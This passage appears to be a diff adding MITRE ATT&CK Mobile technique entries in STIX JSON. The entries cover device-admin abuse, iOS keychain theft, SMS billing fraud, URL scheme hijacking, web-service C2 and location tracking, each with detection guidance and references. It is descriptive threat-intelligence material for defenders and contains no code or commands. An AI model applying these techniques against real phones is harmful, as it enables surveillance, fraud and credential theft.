DeviceAdminInfo. Retrieved November 20, 2020." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-22" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may request device administrator permissions to perform malicious actions.\n\nBy abusing the device administration API, adversaries can perform several nefarious actions, such as resetting the device’s password for [Device Lockout](https://attack.mitre.org/techniques/T1446), factory resetting the device to [Delete Device Data](https://attack.mitre.org/techniques/T1447) and any traces of the malware, disabling all of the device’s cameras, or make it more difficult to uninstall the app.(Citation: Android DeviceAdminInfo)\n\nDevice administrators must be approved by the user at runtime, with a system popup showing which of the actions have been requested by the app. In conjunction with other techniques, such as [Input Injection](https://attack.mitre.org/techniques/T1516), an app can programmatically grant itself administrator permissions without any user input.", + "modified": "2022-04-01T16:52:36.965Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Device Administrator Permissions", + "x_mitre_detection": "Users can see when an app requests device administrator permissions. Users can also view which apps have device administrator permissions in the settings menu.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--831e3269-da49-48ac-94dc-948008e8fd16", + "type": "attack-pattern", + "created": "2017-10-25T14:48:34.830Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1443", + "external_id": "T1443" + } + ], + "modified": "2018-10-17T01:05:10.701Z", + "name": "Remotely Install Application", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:45:39.362Z", + "name": "Keychain", + "description": "Adversaries may collect keychain data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials. \n\nOn the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. By utilizing a privilege escalation exploit or existing root access, adversaries can access the entire encrypted database.(Citation: Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can potentially detect jailbroken devices. Application vetting services may be able to detect known privilege escalation exploits contained within applications, as well as searching application packages for strings that correlate to known password store locations.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--8605a0ec-b44a-4e98-a7fc-87d4bd3acb66", + "created": "2022-04-01T15:01:32.169Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1634/001", + "external_id": "T1634.001" + }, + { + "source_name": "Apple Keychain Services", + "description": "Apple, Inc.. (n.d.). Keychain Services. Retrieved June 24, 2020.", + "url": "https://developer.apple.com/documentation/security/keychain_services" + }, + { + "source_name": "Elcomsoft Decrypt Keychain", + "description": "V. Katalov. (2018, December 18). Six Ways to Decrypt iPhone Passwords from the Keychain. Retrieved June 24, 2020.", + "url": "https://blog.elcomsoft.com/2018/12/six-ways-to-decrypt-iphone-passwords-from-the-keychain/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html", + "external_id": "AUT-11" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--88932a8c-3a17-406f-9431-1da3ff19f6d6", + "created": "2017-10-25T14:48:29.092Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1403", + "url": "https://attack.mitre.org/techniques/T1403" + }, + { + "source_name": "Sabanal-ART", + "url": "https://www.blackhat.com/docs/asia-15/materials/asia-15-Sabanal-Hiding-Behind-ART-wp.pdf", + "description": "Paul Sabanal. (2015). Hiding Behind ART. Retrieved December 21, 2016." + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "ART (the Android Runtime) compiles optimized code on the device itself to improve performance. An adversary may be able to use escalated privileges to modify the cached code in order to hide malicious behavior. Since the code is compiled on the device, it may not receive the same level of integrity checks that are provided to code running in the system partition.(Citation: Sabanal-ART)", + "modified": "2022-04-06T15:46:29.338Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Modify Cached Executable Code", + "x_mitre_detection": "Modifications to cached executable code can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversary behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--89fcd02f-62dc-40b9-a54b-9ac4b1baef05", + "type": "attack-pattern", + "created": "2017-10-25T14:48:28.456Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "external_id": "T1419", + "url": "https://attack.mitre.org/techniques/T1419", + "source_name": "mitre-mobile-attack" + }, + { + "url": "https://developer.android.com/reference/android/os/Build", + "description": "Android. (n.d.). Build. Retrieved December 21, 2016.", + "source_name": "Android-Build" + } + ], + "modified": "2019-10-16T13:24:48.936Z", + "name": "Device Type Discovery", + "description": "On Android, device type information is accessible to apps through the android.os.Build class (Citation: Android-Build). Device information could be used to target privilege escalation exploits.", + "kill_chain_phases": [ + { + "phase_name": "discovery", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--8c7862ff-3449-4ac6-b0fd-ac1298a822a5", + "created": "2020-05-04T13:49:34.706Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1576", + "url": "https://attack.mitre.org/techniques/T1576" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-43" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by:\n\n* Abusing device owner permissions to perform silent uninstallation using device owner API calls.\n* Abusing root permissions to delete files from the filesystem.\n* Abusing the accessibility service. This requires an intent be sent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.", + "modified": "2022-03-30T19:34:09.371Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Uninstall Malicious Application", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--8e27551a-5080-4148-a584-c64348212e4f", + "created": "2017-10-25T14:48:31.694Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1447", + "url": "https://attack.mitre.org/techniques/T1447" + }, + { + "source_name": "Android DevicePolicyManager 2019", + "url": "https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html", + "description": "Android Developers. (n.d.). DevicePolicyManager. Retrieved September 22, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location. (Citation: Android DevicePolicyManager 2019)\n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.", + "modified": "2022-03-30T19:50:37.727Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Delete Device Data", + "x_mitre_detection": "Mobile security products can detect which applications can request device administrator permissions. Users can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--8f0e39c6-82c9-41ec-9f93-5696c0f2e274", + "created": "2017-10-25T14:48:09.082Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1448", + "url": "https://attack.mitre.org/techniques/T1448" + }, + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." + }, + { + "source_name": "AndroidSecurity2014", + "url": "https://static.googleusercontent.com/media/source.android.com/en//security/reports/Google_Android_Security_2014_Report_Final.pdf", + "description": "Google. (2014). Android Security 2014 Year in Review. Retrieved December 12, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "A malicious app may trigger fraudulent charges on a victim’s carrier billing statement in several different ways, including SMS toll fraud and SMS shortcodes that make purchases.\n\nPerforming SMS fraud relies heavily upon the fact that, when making SMS purchases, the carriers perform device verification but not user verification. This allows adversaries to make purchases on behalf of the user, with little or no user interaction.(Citation: Google Bread)\n\nMalicious applications may also perform toll billing, which occurs when carriers provide payment endpoints over a web page. The application connects to the web page over cellular data so the carrier can directly verify the number, or the application must retrieve a code sent via SMS and enter it into the web page.(Citation: Google Bread)\n\nOn iOS, apps cannot send SMS messages.\n\nOn Android, apps must hold the `SEND_SMS` permission to send SMS messages. Additionally, Android version 4.2 and above has mitigations against this threat by requiring user consent before allowing SMS messages to be sent to premium numbers (Citation: AndroidSecurity2014).", + "modified": "2022-04-06T13:57:38.841Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Carrier Billing Fraud", + "x_mitre_detection": "Starting with Android 4.2 the user is prompted and must provide consent before applications can send SMS messages to premium numbers.(Citation: AndroidSecurity2014)\n\nOn Android 6.0 and up, the user can view which applications have permission to send SMS messages through the device settings screen, and the user can choose to revoke the permissions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--8f142a25-f6c3-4520-bd50-2ae3ab50ed3e", + "type": "attack-pattern", + "created": "2017-10-25T14:48:17.533Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1415", + "external_id": "T1415" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-10.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "AUT-10" + }, + { + "source_name": "FireEye-Masque2", + "description": "Hui Xue, Tao Wei, Yulong Zhang, Song Jin, Zhaofeng Chen. (2015, February 19). IOS MASQUE ATTACK REVIVED: BYPASSING PROMPT FOR TRUST AND APP URL SCHEME HIJACKING. Retrieved December 21, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html" + }, + { + "source_name": "Dhanjani-URLScheme", + "description": "Nitesh Dhanjani. (2010, November 8). Insecure Handling of URL Schemes in Apple’s iOS. Retrieved December 21, 2016.", + "url": "http://www.dhanjani.com/blog/2010/11/insecure-handling-of-url-schemes-in-apples-ios.html" + }, + { + "source_name": "IETF-PKCE", + "description": "N. Sakimura, J. Bradley, and N. Agarwal. (2015, September). IETF RFC 7636: Proof Key for Code Exchange by OAuth Public Clients. Retrieved December 21, 2016.", + "url": "https://tools.ietf.org/html/rfc7636" + }, + { + "source_name": "MobileIron-XARA", + "description": "Michael T. Raggo. (2015, October 1). iOS URL Scheme Hijacking (XARA) Attack Analysis and Countermeasures. Retrieved December 21, 2016.", + "url": "https://www.mobileiron.com/en/smartwork-blog/ios-url-scheme-hijacking-xara-attack-analysis-and-countermeasures" + } + ], + "modified": "2020-10-23T15:05:40.674Z", + "name": "URL Scheme Hijacking", + "description": "An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application(Citation: FireEye-Masque2)(Citation: Dhanjani-URLScheme). This technique, for example, could be used to capture OAuth authorization codes(Citation: IETF-PKCE) or to phish user credentials(Citation: MobileIron-XARA).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-16T13:32:55.266Z", + "name": "Bidirectional Communication", + "description": "Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to and receiving output from a compromised system. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\n \n\nPopular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee", + "created": "2022-04-06T15:47:06.071Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1481/002", + "external_id": "T1481.002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:51:58.228Z", + "name": "Non-Standard Port", + "description": "Adversaries may generate network traffic using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088 or port 587 as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting reports may show network communications performed by the application, including hosts, ports, protocols, and URLs. Further detection would most likely be at the enterprise level, through packet and/or netflow inspection. Many properly configured firewalls may also naturally block command and control traffic over non-standard ports.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "created": "2019-08-01T13:44:09.368Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1509", + "external_id": "T1509" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:32:37.109Z", + "name": "Compromise Software Supply Chain", + "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services can detect malicious code in applications. System partition integrity checking mechanisms can detect unauthorized or malicious code contained in the system partition.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "created": "2022-03-28T19:25:17.596Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1474/003", + "external_id": "T1474.003" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-4.html", + "external_id": "SPC-4" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-11.html", + "external_id": "SPC-11" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-12.html", + "external_id": "SPC-12" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-18.html", + "external_id": "SPC-18" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-20.html", + "external_id": "SPC-20" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:56:04.790Z", + "name": "Dead Drop Resolver", + "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers. \n\n \n\nPopular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. \n\n \n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis, or enable operational resiliency (since this infrastructure may be dynamically changed). ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "created": "2022-04-06T15:41:03.914Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1481/001", + "external_id": "T1481.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:50:21.363Z", + "name": "Location Tracking", + "description": "Adversaries may track a device’s physical location through use of standard operating system APIs via malicious or exploited applications on the compromised device. \n\n \n\nOn Android, applications holding the `ACCESS_COAURSE_LOCATION` or `ACCESS_FINE_LOCATION` permissions provide access to the device’s physical location. On Android 10 and up, declaration of the `ACCESS_BACKGROUND_LOCATION` permission in an application’s manifest will allow applications to request location access even when the application is running in the background.(Citation: Android Request Location Permissions) Some adversaries have utilized integration of Baidu map services to retrieve geographical location once the location access permissions had been obtained.(Citation: PaloAlto-SpyDealer)(Citation: Palo Alto HenBox) \n\n \n\nOn iOS, applications must include the `NSLocationWhenInUseUsageDescription`, `NSLocationAlwaysAndWhenInUseUsageDescription`, and/or `NSLocationAlwaysUsageDescription` keys in their `Info.plist` file depending on the extent of requested access to location information.(Citation: Apple Requesting Authorization for Location Services) On iOS 8.0 and up, applications call `requestWhenInUseAuthorization()` to request access to location information when the application is in use or `requestAlwaysAuthorization()` to request access to location information regardless of whether the application is in use. With elevated privileges, an adversary may be able to access location data without explicit user consent with the `com.apple.locationd.preauthorized` entitlement key.(Citation: Google Project Zero Insomnia)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Android applications requesting the `ACCESS_COARSE_LOCATION`, `ACCESS_FINE_LOCATION`, or `ACCESS_BACKGROUND_LOCATION` permissions and iOS applications including the `NSLocationWhenInUseUsageDescription`, `NSLocationAlwaysAndWhenInUseUsageDescription`, and/or `NSLocationAlwaysUsageDescription` keys in their `Info.plist` file could be scrutinized during the application vetting process. \n\n \n\nIn both Android (6.0 and up) and iOS, users can view which applications have the permission to access the device location through the device settings screen and revoke permissions as necessary. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "created": "2017-10-25T14:48:12.267Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1430", + "external_id": "T1430" + }, + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + }, + { + "source_name": "Android Request Location Permissions", + "description": "Android Developers. (2022, March 24). Request Location Permissions. Retrieved April 1, 2022.", + "url": "https://developer.android.com/training/location/permissions" + }, + { + "source_name": "Apple Requesting Authorization for Location Services", + "description": "Apple Developers. (n.d.). Requesting Authorization for Location Services. Retrieved April 1, 2022.", + "url": "https://developer.apple.com/documentation/corelocation/requesting_authorization_for_location_services" + }, + { + "source_name": "Google Project Zero Insomnia", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020.", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" + }, + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-24.html", + "external_id": "APP-24" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:56:34.537Z", + "name": "Device Administrator Permissions", + "description": "Adversaries may abuse Android’s device administration API to obtain a higher degree of control over the device. By abusing the API, adversaries can perform several nefarious actions, such as resetting the device’s password for [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642), factory resetting the device for [File Deletion](https://attack.mitre.org/techniques/T1630/002) and to delete any traces of the malware, disabling all the device’s cameras, or to make it more difficult to uninstall the app.\n\nDevice administrators must be approved by the user at runtime, with a system popup showing which actions have been requested by the app. In conjunction with other techniques, such as [Input Injection](https://attack.mitre.org/techniques/T1516), an app can programmatically grant itself administrator permissions without any user input.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users are prompted for approval when an application requests device administrator permissions. Users can see which applications are registered as device administrators in the device settings. Application vetting services can check for the string `BIND_DEVICE_ADMIN` in the application’s manifest. This indicates it can prompt the user for device administrator permissions.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "created": "2022-04-01T15:59:05.830Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1626/001", + "external_id": "T1626.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "external_id": "APP-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--9d7c32f4-ab39-49dc-8055-8106bc2294a1", + "created": 